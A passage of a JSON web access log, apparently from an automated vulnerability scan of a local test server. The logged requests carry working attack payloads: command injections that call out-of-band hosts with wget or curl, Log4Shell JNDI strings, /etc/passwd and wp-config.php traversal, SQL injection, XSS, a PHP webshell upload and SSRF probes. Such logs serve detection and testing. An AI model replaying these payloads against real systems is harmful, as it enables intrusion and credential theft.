+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.031","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"op=login&username=admin|pwd&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"command=2&ipAddr=&dnsAddr=$(wget+http://ca28fg0smpvbd3qg07h0hbo3xghapdmcf.oast.live)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/networkDiag.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-----------------------------31046105003900160576454225745\x0D\x0AContent-Disposition: form-data; name=\x22fileToUpload\x22; filename=\x2229KD1sAoYjh9kKP3VJDhxOwbnwX.php\x22\x0D\x0AContent-Type: image/gif\x0D\x0A\x0D\x0AGIF89a213213123\x0D\x0A\x0D\x0A mt.handler_to_coderef\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A YHdnZXQgaHR0cDovL2NhMjhmZzBzbXB2YmQzcWcwN2gwYTZjZnFrNHlhYTU1Ny5vYXN0LmxpdmVg\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"sondata[ip]=a|curl ca28fg0smpvbd3qg07h0uk88j3xr74gtq.oast.live&jsondata[type]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/ping.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca28fg0smpvbd3qg07h0t6cjw3hjbjo79.oast.live%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.hg/hgrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/zabbix.php?action=dashboard.list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/data/usrimg/29kd1saoyjh9kkp3vjdhxowbnwx.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"@ca28fg0smpvbd3qg07h01tofq55epfpgt.oast.live","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"${jndi:ldap://${hostName}.useragent.ca28fg0smpvbd3qg07h0ynskb9ky4ymma.oast.live}", "http_referer":"${jndi:ldap://${hostName}.referer.ca28fg0smpvbd3qg07h04zscd7huydsng.oast.live}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://${hostName}.xforwardedfor.ca28fg0smpvbd3qg07h0txcejmi9dtek5.oast.live}"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca28fg0smpvbd3qg07h0w1czinh75uxcj.oast.live%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 29KD23QBSy5Brk2N05RT3JkMvxy\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl?detail=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD226MSRa6VloxCqiURns7aPh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"::1"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET http://ca28fg0smpvbd3qg07h0n7kag6y4nnhh4.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /control/stream?contentId=%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=http://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wwwctrl.cgi?action=home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/oembed/1.0/proxy?url=http://ca28fg0smpvbd3qg07h0an5nap538m844.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mainfunction.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 